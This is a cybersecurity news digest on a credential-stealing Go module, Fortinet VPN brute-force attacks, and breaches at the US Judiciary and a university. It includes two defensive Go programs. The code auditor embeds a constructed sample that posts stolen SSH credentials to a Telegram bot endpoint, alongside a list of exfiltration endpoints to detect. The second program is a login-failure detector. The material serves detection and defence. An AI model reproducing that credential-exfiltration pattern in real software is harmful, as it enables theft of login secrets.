SparTech Software CyberPulse – Your quick strike cyber update for August 26, 2025 4:05 PM

Malicious Go Module Steals SSH Credentials via Telegram

A new supply-chain attack has emerged in the Golang ecosystem, where a malicious Go module masquerading as an SSH brute-force tool was discovered to be covertly exfiltrating credentials to an attacker via Telegram. This incident highlights an increasing trend of attackers abusing open source package repositories to target infrastructure and cloud environments.

Technical Overview

The module, named “Golang random IP SSH brute force,” claimed to be a tool for brute-forcing SSH services but was found to contain embedded routines for credential theft. When executed, it scans random IPv4 addresses for accessible SSH services on TCP port 22, attempting authentication using an internal list of username-password pairs.

Exfiltration Mechanism

Upon a successful login, the tool transmits the compromised host’s IP address, along with the working username and password, to a hardcoded Telegram bot under the attacker’s control. Using Telegram as the command-and-control channel helps the traffic evade traditional network security monitoring: it is encrypted and indistinguishable from legitimate use of a popular messaging service.

Threat Actor Infrastructure

The associated GitHub account that distributed the malicious package has been taken down. However, the tool’s methodology (combining credential theft, SSH brute forcing, and discreet exfiltration) remains a template for future supply chain threats, made more consequential by the prevalence of Go-based software in DevOps and backend operations.

Defensive Measures

Organizations relying on open source components are advised to vet external code before use and to restrict dependencies to approved, trusted package sources. Monitoring the network for anomalous traffic to Telegram, and blocking outbound access to messaging services from critical infrastructure, are also recommended. Detection should additionally cover large-scale scanning activity originating from internal hosts, and code audits should look for hidden network calls within packaged binaries.
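The code audit recommended above can be partly automated. The following Go program is an added example, not code from the original article or from the malicious module: it parses a Go source file with the standard go/ast package and reports two kinds of indicators, string literals that reference messaging-service endpoints commonly used for exfiltration (Telegram’s bot API among them) and any call made through net/http, which an SSH tool has no legitimate reason to use. The embedded sampleSource is a constructed, hypothetical file that mimics the pattern described in the article; the endpoint fragments and package list are assumptions chosen for illustration and would be extended in practice.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"strconv"
	"strings"
)

// sampleSource is a constructed, hypothetical Go file mimicking the pattern described
// above (an SSH "tool" that quietly posts results to a Telegram bot); it is not the real module.
const sampleSource = `package main

import (
	"net/http"
	"net/url"
)

const botToken = "PLACEHOLDER-TOKEN"

func report(ip, user, pass string) {
	endpoint := "https://api.telegram.org/bot" + botToken + "/sendMessage"
	http.PostForm(endpoint, url.Values{"text": {ip + " " + user + " " + pass}})
}
`

// Finding is one indicator that warrants manual review.
type Finding struct {
	Line   int
	Kind   string // "literal" (suspicious endpoint string) or "call" (outbound network call)
	Detail string
}

// exfilIndicators are endpoint fragments of messaging services commonly abused as
// exfiltration channels; a package with no business talking to them should not reference them.
var exfilIndicators = []string{"api.telegram.org", "/sendMessage", "discord.com/api/webhooks", "hooks.slack.com"}

// outboundPackages are imports whose use must be explainable by the package's stated purpose.
var outboundPackages = map[string]bool{"net/http": true}

// AuditSource parses one Go file and reports string literals matching known exfiltration
// endpoints plus every call made through an outbound-network package.
func AuditSource(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	file, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	// Map each import's local name to its path so "http.PostForm" resolves to net/http.
	importNames := map[string]string{}
	for _, imp := range file.Imports {
		path, _ := strconv.Unquote(imp.Path.Value)
		name := path[strings.LastIndex(path, "/")+1:]
		if imp.Name != nil {
			name = imp.Name.Name
		}
		importNames[name] = path
	}
	var findings []Finding
	ast.Inspect(file, func(n ast.Node) bool {
		switch x := n.(type) {
		case *ast.BasicLit:
			val, err := strconv.Unquote(x.Value)
			if x.Kind != token.STRING || err != nil {
				return true
			}
			for _, ind := range exfilIndicators {
				if strings.Contains(val, ind) {
					findings = append(findings, Finding{fset.Position(x.Pos()).Line, "literal", val})
				}
			}
		case *ast.CallExpr:
			// Only selector calls (pkg.Func) are attributed; method calls on locals are skipped.
			if sel, ok := x.Fun.(*ast.SelectorExpr); ok {
				if pkg, ok := sel.X.(*ast.Ident); ok {
					if path, known := importNames[pkg.Name]; known && outboundPackages[path] {
						findings = append(findings, Finding{fset.Position(x.Pos()).Line, "call", path + "." + sel.Sel.Name})
					}
				}
			}
		}
		return true
	})
	return findings, nil
}

func main() {
	findings, err := AuditSource("sample.go", sampleSource)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("sample.go:%d %s %s\n", f.Line, f.Kind, f.Detail)
	}
}
```

Run against the embedded sample it reports the two endpoint fragments on the line that builds the Telegram URL and the net/http call on the following line. In a real vetting pipeline the same function would be applied to every file of a dependency before it is allowed into the module cache; concatenated or obfuscated strings will slip past literal matching, which is why the outbound-call check is kept as an independent signal.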

Surge in Brute Force and FGFM Protocol Attacks Against Fortinet SSL VPNs and FortiManager

Security researchers have recorded a pronounced uptick in targeted brute-force attacks and exploitation attempts using the Fortinet Group Fabric Management (FGFM) protocol against Fortinet SSL VPNs and FortiManager appliances. This pattern often correlates with forthcoming vulnerability disclosures and active exploitation campaigns in the wild.

Attack Methodology

Attackers have been observed launching multiple waves of brute-force campaigns, targeting external-facing SSL VPN devices and management platforms. These attacks typically leverage widespread password spraying and interface fingerprinting to identify unpatched or weakly secured Fortinet appliances.

Recent Vulnerabilities and Proof-of-Concept Code

The surge coincides with the public release of proof-of-concept exploits for new vulnerabilities, including unauthenticated OS command injection. Security teams are warning that sophisticated threat actors may pivot quickly to leverage zero-days or newly disclosed issues in rapid exploitation cycles.

Mitigation Strategies

Administrators are strongly urged to patch all Fortinet products, implement multifactor authentication on VPN access, and review remote management interface exposure. Network defenders should monitor for repeated authentication failures, unusual management traffic, and unexpected FGFM protocol activity, any of which could indicate lateral movement or unauthorized device configuration changes.
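The monitoring for repeated authentication failures described above, as an added example that is not part of the original article and not Fortinet’s or the researchers’ code: a small Go detector that reads key=value log lines, keeps a sliding window of failed SSL VPN logins per source IP, and raises a burst alert when one source fails too often and a spray alert when one source cycles through many distinct usernames. The sampleLog lines are constructed and only loosely modelled on key=value syslog output; the field names, the action string ssl-login-fail, and the thresholds passed to DetectBruteForce are assumptions to be replaced with the appliance’s real log schema and the site’s own tolerance.

```go
package main

import (
	"fmt"
	"strings"
	"time"
)

// sampleLog holds constructed lines loosely modelled on key=value syslog output from
// an SSL VPN appliance. They are illustrative only, not real Fortinet log records.
const sampleLog = `date=2025-08-26 time=10:00:01 type=event subtype=vpn action=ssl-login-fail remip=203.0.113.10 user=alice
date=2025-08-26 time=10:00:03 type=event subtype=vpn action=ssl-login-fail remip=203.0.113.10 user=bob
date=2025-08-26 time=10:00:05 type=event subtype=vpn action=ssl-login-fail remip=203.0.113.10 user=carol
date=2025-08-26 time=10:00:06 type=event subtype=vpn action=ssl-login-fail remip=203.0.113.10 user=dave
date=2025-08-26 time=10:00:08 type=event subtype=vpn action=ssl-login-fail remip=203.0.113.10 user=erin
date=2025-08-26 time=10:00:09 type=event subtype=vpn action=ssl-login-fail remip=203.0.113.10 user=frank
date=2025-08-26 time=10:01:00 type=event subtype=vpn action=ssl-login-fail remip=198.51.100.7 user=alice
date=2025-08-26 time=10:07:00 type=event subtype=vpn action=ssl-login-fail remip=198.51.100.7 user=alice
date=2025-08-26 time=10:07:30 type=event subtype=vpn action=tunnel-up remip=198.51.100.7 user=alice`

// Event is the subset of a parsed log line the detector needs.
type Event struct {
	At     time.Time
	Action string
	Source string
	User   string
}

// Alert describes one source that crossed a threshold. Kind is "burst" (many failures
// in the window) or "spray" (failures spread across many distinct usernames).
type Alert struct {
	Source        string
	Kind          string
	Failures      int
	DistinctUsers int
}

// ParseLine splits a key=value line into an Event; lines missing the fields we
// need (or with an unparsable timestamp) are reported as not ok rather than guessed.
func ParseLine(line string) (Event, bool) {
	kv := map[string]string{}
	for _, field := range strings.Fields(line) {
		if parts := strings.SplitN(field, "=", 2); len(parts) == 2 {
			kv[parts[0]] = strings.Trim(parts[1], `"`)
		}
	}
	at, err := time.Parse("2006-01-02 15:04:05", kv["date"]+" "+kv["time"])
	if err != nil || kv["action"] == "" || kv["remip"] == "" {
		return Event{}, false
	}
	return Event{At: at, Action: kv["action"], Source: kv["remip"], User: kv["user"]}, true
}

// DetectBruteForce keeps, per source IP, the failed logins inside a sliding window and
// raises at most one burst alert and one spray alert per source. Lines are assumed to
// be in time order, as they would be when read from a syslog stream.
func DetectBruteForce(lines []string, window time.Duration, maxFailures, maxUsers int) []Alert {
	failures := map[string][]Event{}
	alerted := map[string]bool{}
	var alerts []Alert
	for _, line := range lines {
		ev, ok := ParseLine(line)
		if !ok || ev.Action != "ssl-login-fail" {
			continue
		}
		// Append the new failure and discard anything older than the window.
		hist := append(failures[ev.Source], ev)
		cutoff := ev.At.Add(-window)
		start := 0
		for start < len(hist) && hist[start].At.Before(cutoff) {
			start++
		}
		hist = hist[start:]
		failures[ev.Source] = hist
		users := map[string]bool{}
		for _, h := range hist {
			users[h.User] = true
		}
		if len(users) >= maxUsers && !alerted[ev.Source+"/spray"] {
			alerted[ev.Source+"/spray"] = true
			alerts = append(alerts, Alert{ev.Source, "spray", len(hist), len(users)})
		}
		if len(hist) >= maxFailures && !alerted[ev.Source+"/burst"] {
			alerted[ev.Source+"/burst"] = true
			alerts = append(alerts, Alert{ev.Source, "burst", len(hist), len(users)})
		}
	}
	return alerts
}

func main() {
	lines := strings.Split(sampleLog, "\n")
	for _, a := range DetectBruteForce(lines, 5*time.Minute, 5, 4) {
		fmt.Printf("%-6s %s failures=%d distinct_users=%d\n", a.Kind, a.Source, a.Failures, a.DistinctUsers)
	}
}
```

With a five-minute window, five failures and four distinct users as thresholds, the fast source 203.0.113.10 triggers a spray alert on its fourth username and a burst alert on its fifth failure, while 198.51.100.7, whose two failures are six minutes apart, never accumulates enough in one window and is correctly left alone. The two separate alert kinds matter because password spraying deliberately keeps the per-account failure count low; counting per source rather than per account is what exposes it.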

Federal Judiciary Increases Case Management System Protections Following Persistent Cyberattacks

In response to a series of sophisticated and persistent cyberattacks targeting its electronic case management system, the U.S. Judiciary is implementing heightened security protocols to protect sensitive court documents and ensure the continuity of judicial operations.

Attack Context and Targets

Recent intrusions demonstrate targeted efforts to access sealed, confidential, or otherwise sensitive legal filings. While the majority of case documents are public, the threat actors are focusing on those under restricted access, increasing the risk of inadvertent exposure or abuse of proprietary legal information.

Security Enhancements and Partnerships

The Judiciary has expanded technical safeguards, increased monitoring, and strengthened authentication controls for highly sensitive documents. It is collaborating closely with Congress and multiple federal agencies, including the Department of Justice and the Department of Homeland Security, to adopt best practices and coordinated incident response actions across the judicial branch.

Modernization Initiatives

Ongoing investments have been directed at modernizing IT systems, increasing the detection of sophisticated threats, and implementing rigorous access control audits. The Judiciary reiterates its commitment to transparency for public legal records while ensuring robust confidentiality measures for sensitive filings mandated by law.

University of Western Australia Investigates Cybersecurity Incident Involving Unauthorized Access

The University of Western Australia (UWA) is investigating a cybersecurity incident that resulted in unauthorized access to university systems. The breach comes amid a global rise in attacks targeting educational institutions and research data repositories.

Incident Details

The incident was confirmed by UWA’s IT services following detection of unusual activity on its network infrastructure. Initial assessments point toward unauthorized access, though the full scope and impact, including any compromised data or services, are still under internal review.

Response and Containment

UWA promptly initiated incident containment procedures, engaged cybersecurity specialists, and notified relevant authorities. The university is conducting a forensic investigation to determine the attack vector, assess data exposure, and identify corrective actions to fortify its digital environment.

Impact on Academic Operations

While some IT services may experience temporary disruptions as containment measures are enforced, UWA has stated that core academic and administrative functions are being prioritized for rapid restoration. Notifications and guidance have been issued campus-wide to support awareness and vigilance against potential follow-up attacks.
